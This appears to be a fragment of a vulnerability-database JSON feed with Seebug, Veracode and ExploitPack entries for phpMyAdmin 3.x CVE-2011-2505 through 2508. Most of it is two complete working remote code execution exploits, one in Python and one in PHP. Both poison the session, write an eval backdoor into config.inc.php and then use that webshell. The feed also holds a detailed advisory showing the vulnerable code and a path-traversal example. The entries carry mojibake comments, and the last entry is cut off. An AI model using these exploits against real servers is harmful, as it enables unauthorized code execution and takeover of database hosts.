"cvss3": {}, "published": "2011-07-10T00:00:00", "type": "seebug", "title": "phpMyAdmin3 (pma3) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-10T00:00:00", "id": "SSV:20714", "href": "https://www.seebug.org/vuldb/ssvid-20714", "sourceData": "\n #!/usr/bin/env python\r\n# coding=utf-8\r\n# pma3 - phpMyAdmin3 remote code execute exploit\r\n# Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript">\r\n/* <![CDATA[ */\r\n(function(){try{var 
s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>>\r\n# Thx Superhei\r\n# Tested on: 3.1.1, 3.2.1, 3.4.3\r\n# CVE: CVE-2011-2505, CVE-2011-2506\r\n# Date: 2011-07-08\r\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\r\n################################################\r\n \r\n# Requirements: 1. "config" directory must created&writeable in pma directory.\r\n# 2. session.auto_start = 1 in php.ini configuration.\r\n \r\n \r\nimport os,sys,urllib2,re\r\n \r\ndef usage(program):\r\n print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\r\nexecute exploit"\r\n print "Usage: %s <PMA_url>" % program\r\n print "Example: %s http://www.test.com/phpMyAdmin" % program\r\n sys.exit(0)\r\n \r\ndef main(args):\r\n try:\r\n if len(args) < 2:\r\n usage(args[0])\r\n \r\n if args[1][-1] == "/":\r\n args[1] = args[1][:-1]\r\n \r\n # \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd\r\n print "[+] Trying get form token&session_id.."\r\n content = urllib2.urlopen(args[1]+"/index.php").read()\r\n r1 = re.findall("token=(\\w{32})", content)\r\n r2 = re.findall("phpMyAdmin=(\\w{32,40})", content)\r\n \r\n if not r1:\r\n r1 = re.findall("token\\" value=\\"(\\w{32})\\"", content)\r\n if not r2:\r\n r2 = re.findall("phpMyAdmin\\" value=\\"(\\w{32,40})\\"", content)\r\n if len(r1) < 1 or len(r2) < 1:\r\n print "[-] Cannot find form token and session id...exit."\r\n sys.exit(-1)\r\n \r\n token = r1[0]\r\n sessionid = r2[0]\r\n print "[+] Token: %s , SessionID: %s" % (token, sessionid)\r\n \r\n # 
\ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5\r\n print "[+] Trying to insert payload in $_SESSION.."\r\n uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"\r\n url = args[1]+uri\r\n \r\n opener = urllib2.build_opener()\r\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\r\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\r\n(sessionid, sessionid)))\r\n urllib2.install_opener(opener)\r\n urllib2.urlopen(url)\r\n \r\n # \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell\r\n print "[+] Trying get webshell.."\r\n postdata =\r\n"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"\r\n% (sessionid, token)\r\n url = args[1]+"/setup/config.php"\r\n \r\n # print "[+]Postdata: %s" % postdata\r\n urllib2.urlopen(url, postdata)\r\n print "[+] All done, pray for your lucky!"\r\n \r\n # \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell\r\n url = args[1]+"/config/config.inc.php"\r\n opener.addheaders.append(('Code', 'phpinfo();'))\r\n urllib2.install_opener(opener)\r\n print "[+] Trying connect shell: %s" % url\r\n result = re.findall("System \\</td\\>\\<td\r\nclass=\\"v\\"\\>(.*)\\</td\\>\\</tr\\>", urllib2.urlopen(url).read())\r\n if len(result) == 1:\r\n print "[+] Lucky u! 
System info: %s" % result[0]\r\n print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"\r\n \r\n else:\r\n print "[-] Cannot get webshell."\r\n \r\n except Exception, e:\r\n print e\r\n \r\nif __name__ == "__main__" : main(sys.argv)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20714", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:03:22", "description": "No description provided by source.", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x Swekey Remote Code Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "SSV:20711", "href": "https://www.seebug.org/vuldb/ssvid-20711", "sourceData": "\n <?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . 
,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \r\n\t _ _ ___ __ ____ __ ___ ___ \r\n\t| |-| || _ |\\ /\\ /| _ || ) \r\n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n\r\nUse responsibly.\r\n\r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n\r\nif(php_sapi_name()==='cli'){\r\n\tif(!isset($argv[1])){\r\n\t\toutput(" Usage\\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");\r\n\t\tkillme();\r\n\t}\r\n\t$pmaurl = $argv[1];\t\r\n}else{\r\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n\toutput('[!] Fatal error. 
Need cURL!');\r\n\tkillme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=&#9829;>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n\r\noutput("[i] Running...");\r\n\r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\r\n\tCURLOPT_HEADER => 1,\r\n\tCURLOPT_RETURNTRANSFER => 1,\r\n\tCURLOPT_TIMEOUT => 4,\r\n\tCURLOPT_SSL_VERIFYPEER => false,\r\n\tCURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput("[*] Contacting server to retrive session cookie and token.");\r\n\r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n\toutput("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");\r\n\tkillme();\r\n}\r\nif(!$result){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n\toutput("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");\r\n\tkillme();\r\n}\r\n\r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput("[i] Cookie:".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput("[i] Token:".$token);\r\n\r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] 
cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput("[*] Contacting server to make it save the injected code to a file.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput("[*] Contacting server to test if the injected code executes.");\r\nif(!$result = curl_exec($ch)){\r\n\toutput("[!] cURL error:".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n\toutput("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");\r\n\toutput("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");\r\n}else{\r\n\toutput("[!] Code injection failed. 
This instance of phpMyAdmin does not apear to be vulnerable.");\r\n}\r\n\r\n\r\ncurl_close($ch);\r\n\r\nfunction output($msg){\r\n\techo php_sapi_name()!=='cli'?htmlspecialchars("$msg\\n",ENT_QUOTES):"$msg\\n";\r\n\tflush();\r\n}\r\n\r\nfunction killme(){\r\n\toutput("[*] Exiting...");\r\n\techo php_sapi_name()!=='cli'?'<pre>':'';\r\n\tdie();\r\n}\r\n\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20711", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:03:13", "description": "No description provided by source.", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x Multiple Remote Code Executions", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2011-07-09T00:00:00", "id": "SSV:20710", "href": "https://www.seebug.org/vuldb/ssvid-20710", "sourceData": "\n File: libraries/auth/swekey/swekey.auth.lib.php\r\nLines: 266-276\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Variable Manipulation\r\nAssigned CVE id: CVE-2011-2505\r\nPMA Announcement-ID: PMASA-2011-5\r\n266\tif (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)\r\n267\t{\r\n268\t parse_str($_SERVER['QUERY_STRING']);\r\n269\t session_write_close();\r\n270\t session_id($session_to_unset);\r\n271\t session_start();\r\n272\t $_SESSION = array();\r\n273\t session_write_close();\r\n274\t session_destroy();\r\n275\t exit;\r\n276\t}\r\nNotice the call to parse_str on line 268 that passes the query string as its first argument. It's missing a second argument. This means that whatever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit there ain't much to exploit. 
However the session variables persist between requests, thus giving us full control of the $_SESSION array.\r\n\r\nFrom here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities.\r\n\r\n\r\nThe second vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Remote Static Code Injection\r\nAssigned CVE id: CVE-2011-2506\r\nPMA Announcement-ID: PMASA-2011-6\r\n\r\nFile: setup/lib/ConfigGenerator.class.php\r\nLines: 16-78\r\n16\t/**\r\n17\t * Creates config file\r\n18\t *\r\n19\t * @return string\r\n20\t */\r\n21\tpublic static function getConfigFile()\r\n22\t{\r\n23\t $cf = ConfigFile::getInstance();\r\n24\t \r\n25\t $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\\r\\n" : "\\n";\r\n26\t $c = $cf->getConfig();\r\n27\t \r\n28\t // header\r\n29\t $ret = '<?php' . $crlf\r\n30\t . '/*' . $crlf\r\n31\t . ' * Generated configuration file' . $crlf\r\n32\t . ' * Generated by: phpMyAdmin '\r\n33\t . $GLOBALS['PMA_Config']->get('PMA_VERSION')\r\n34\t . ' setup script' . $crlf\r\n35\t . ' * Date: ' . date(DATE_RFC1123) . $crlf\r\n36\t . ' */' . $crlf . $crlf;\r\n37\t \r\n38\t // servers\r\n39\t if ($cf->getServerCount() > 0) {\r\n40\t $ret .= "/* Servers configuration */$crlf\\$i = 0;" . $crlf . $crlf;\r\n41\t foreach ($c['Servers'] as $id => $server) {\r\n42\t $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf\r\n43\t . '$i++;' . $crlf;\r\n44\t foreach ($server as $k => $v) {\r\n45\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n46\t $ret .= "\\$cfg['Servers'][\\$i]['$k'] = "\r\n47\t . (is_array($v) && self::_isZeroBasedArray($v)\r\n48\t ? self::_exportZeroBasedArray($v, $crlf)\r\n49\t : var_export($v, true))\r\n50\t . ';' . $crlf;\r\n51\t }\r\n52\t $ret .= $crlf;\r\n53\t }\r\n54\t $ret .= '/* End of servers configuration */' . $crlf . 
$crlf;\r\n55\t }\r\n56\t unset($c['Servers']);\r\n57\t \r\n58\t // other settings\r\n59\t $persistKeys = $cf->getPersistKeysMap();\r\n60\t \r\n61\t foreach ($c as $k => $v) {\r\n62\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n63\t $ret .= self::_getVarExport($k, $v, $crlf);\r\n64\t if (isset($persistKeys[$k])) {\r\n65\t unset($persistKeys[$k]);\r\n66\t }\r\n67\t }\r\n68\t // keep 1d array keys which are present in $persist_keys (config.values.php)\r\n69\t foreach (array_keys($persistKeys) as $k) {\r\n70\t if (strpos($k, '/') === false) {\r\n71\t $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);\r\n72\t $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf);\r\n73\t }\r\n74\t }\r\n75\t $ret .= '?>';\r\n76\t \r\n77\t return $ret;\r\n78\t}\r\nOn line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code.\r\nOn line 26 the $c array is created from a call to $cf->getConfig().\r\n\r\nFile: libraries/config/ConfigFile.class.php\r\nLines: 469-482\r\n469\t/**\r\n470\t * Returns configuration array (full, multidimensional format)\r\n471\t *\r\n472\t * @return array\r\n473\t */\r\n474\tpublic function getConfig()\r\n475\t{\r\n476\t $c = $_SESSION[$this->id];\r\n477\t foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) {\r\n478\t PMA_array_write($map_to, $c, PMA_array_read($map_from, $c));\r\n479\t PMA_array_remove($map_from, $c);\r\n480\t }\r\n481\t return $c;\r\n482\t}\r\nBingo! The $c array is derived from the $_SESSION array hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. 
Then we would just browse to this file and the webserver would execute it.\r\n\r\nThis vulnerability requires one specific condition. The config directory must have been left in place after the initial configuration. This is something advised against and hence a majority of servers won't be susceptible to this attack. Therefore we'll check out a third and a fourth vulnerability.\r\n\r\n\r\nThe third vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Authenticated Remote Code Execution\r\nAssigned CVE id: CVE-2011-2507\r\nPMA Announcement-ID: PMASA-2011-7\r\n\r\nFile: server_synchronize.php\r\nLine: 466\r\n466\t$trg_db = $_SESSION['trg_db'];\r\nLine: 477\r\n477\t$uncommon_tables = $_SESSION['uncommon_tables'];\r\nLine: 674\r\n674\tPMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false);\r\nFile: libraries/server_synchronize.lib.php\r\nLines: 613-631\r\n613\tfunction PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display)\r\n614\t{\r\n615\t if (isset($uncommon_tables[$table_index])) {\r\n616\t $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link);\r\n617\t $fields = array();\r\n618\t foreach ($fields_result as $each_field) {\r\n619\t $field_name = $each_field['Field'];\r\n620\t $fields[] = $field_name;\r\n621\t }\r\n622\t $uncommon_tables_fields[$table_index] = $fields;\r\n623\t \r\n624\t $Create_Query = PMA_DBI_fetch_value("SHOW CREATE TABLE " . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link);\r\n625\t \r\n626\t // Replace the src table name with a `dbname`.`tablename`\r\n627\t $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/',\r\n628\t PMA_backquote($trg_db) . '.' 
.PMA_backquote($uncommon_tables[$table_index]),\r\n629\t $Create_Query,\r\n630\t $limit = 1\r\n631\t );\r\nThe variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject whatever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into a remote code execution. Basically we can inject the "e" modifier into the regexp pattern which causes the second argument to be executed as PHP code.\r\n\r\nThis vulnerability has two major restrictions from an attacker's perspective. First, the Suhosin patch completely defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need to have previous knowledge of credentials to an account of the database that phpMyAdmin is set up to manage. Except for some obscure configurations that allow us to bypass this restriction.\r\n\r\nSince the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability.\r\n\r\n\r\nThe fourth vulnerability\r\nPatched in: 3.3.10.2 and 3.4.3.1\r\nType: Path Traversal\r\nAssigned CVE id: CVE-2011-2508\r\nPMA Announcement-ID: PMASA-2011-8\r\n\r\nFile: libraries/display_tbl.lib.php\r\nLines: 1291-1299\r\n1291\tif ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) {\r\n1292\t \r\n1293\t if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) {\r\n1294\t $include_file = $GLOBALS['mime_map'][$meta->name]['transformation'];\r\n1295\t \r\n1296\t if (file_exists('./libraries/transformations/' . 
$include_file)) {\r\n1297\t $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']);\r\n1298\t \r\n1299\t require_once './libraries/transformations/' . $include_file;\r\nThis fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to "../../../../../../etc/passwd" the local passwd-file could show up.\r\n\r\nThis vulnerability can only be reached if we're authenticated and requires that the transformation feature is setup correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability.\r\n\r\nFile: libraries/display_tbl.lib.php\r\nLines: 707-710\r\n707\tif ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! 
$_SESSION['tmp_user_values']['hide_transformation']) {\r\n708\t require_once './libraries/transformations.lib.php';\r\n709\t $GLOBALS['mime_map'] = PMA_getMIME($db, $table);\r\n710\t}\r\nAnd the fact that $GLOBALS['mime_map'] is conditionally initialized together with the fact that phpMyAdmin registers all request variables in the global namespace (blacklists some, but not mime_map) allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not set up correctly.\r\n\r\n\r\nSummary\r\n\r\n If the config folder is left in place, phpMyAdmin is vulnerable.\r\n\r\n If an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable.\r\n\r\n If an attacker has access to database credentials and knows how to exploit a local file inclusion, phpMyAdmin is vulnerable.\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20710", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:00", "description": "CVE ID: 
CVE-2011-2505,CVE-2011-2506,CVE-2011-2507,CVE-2011-2508\r\n\r\nphpMyAdmin is a tool written in PHP for administering MySQL over the web.\r\n\r\nphpMyAdmin contains multiple implementation vulnerabilities that malicious users can exploit to disclose sensitive information and take control of affected systems.\r\n\r\n1) An error in the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and to inject and execute arbitrary PHP code;\r\n\r\n2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitized before being used in a call to "preg_replace()" with the e modifier, which can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes;\r\n\r\n3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitized before being used to include files, which can be exploited to include arbitrary files from local resources via directory traversal sequences.\n\nphpMyAdmin 3.x\nVendor patch:\r\n\r\nphpMyAdmin\r\n----------\r\nThe vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's home page:\r\n\r\nhttp://www.phpmyadmin.net/", "cvss3": {}, "published": "2011-07-07T00:00:00", "type": "seebug", "title": "phpMyAdmin 3.x Multiple Security Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], 
"modified": "2011-07-07T00:00:00", "id": "SSV:20704", "href": "https://www.seebug.org/vuldb/ssvid-20704", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "veracode": [{"lastseen": "2022-07-27T10:25:14", "description": "php is vulnerable to authorization bypass. The vulnerability exists as an input validation flaw was discovered in the PHP session serializer. If a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session.\n", "cvss3": {}, "published": "2020-04-10T00:53:58", "type": "veracode", "title": "Authorization Bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3065"], "modified": "2022-04-19T18:32:01", "id": "VERACODE:24428", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24428/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin3 (pma3) - Remote Code Execution", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "exploitpack", "title": "phpMyAdmin3 (pma3) - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-08T00:00:00", "id": "EXPLOITPACK:4274B90AFFC9170C6C5F19A5B572681A", "href": "", "sourceData": "#!/usr/bin/env python\n# coding=utf-8\n# pma3 - phpMyAdmin3 remote code execute exploit\n# Author: wofeiwo<wofeiwo@80sec.com>\n# Thx Superhei\n# Tested on: 3.1.1, 3.2.1, 3.4.3\n# CVE: CVE-2011-2505, CVE-2011-2506\n# Date: 2011-07-08\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\n################################################\n\n# Requirements: 1. \"config\" directory must created&writeable in pma directory.\n# 2. session.auto_start = 1 in php.ini configuration.\n\n\nimport os,sys,urllib2,re\n\ndef usage(program):\n print \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\nexecute exploit\"\n print \"Usage: %s <PMA_url>\" % program\n print \"Example: %s http://www.test.com/phpMyAdmin\" % program\n sys.exit(0)\n\ndef main(args):\n try:\n if len(args) < 2:\n usage(args[0])\n\n if args[1][-1] == \"/\":\n args[1] = args[1][:-1]\n\n # \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd\n print \"[+] Trying get form token&session_id..\"\n content = urllib2.urlopen(args[1]+\"/index.php\").read()\n r1 = re.findall(\"token=(\\w{32})\", content)\n r2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content)\n\n if not r1:\n r1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content)\n if not r2:\n r2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content)\n if len(r1) < 1 or len(r2) < 1:\n print \"[-] Cannot find form token and session id...exit.\"\n sys.exit(-1)\n\n token = r1[0]\n sessionid = r2[0]\n print \"[+] Token: %s 
, SessionID: %s\" % (token, sessionid)\n\n # \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5\n print \"[+] Trying to insert payload in $_SESSION..\"\n uri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\"\n url = args[1]+uri\n\n opener = urllib2.build_opener()\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\n(sessionid, sessionid)))\n urllib2.install_opener(opener)\n urllib2.urlopen(url)\n\n # \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell\n print \"[+] Trying get webshell..\"\n postdata =\n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\"\n% (sessionid, token)\n url = args[1]+\"/setup/config.php\"\n\n # print \"[+]Postdata: %s\" % postdata\n 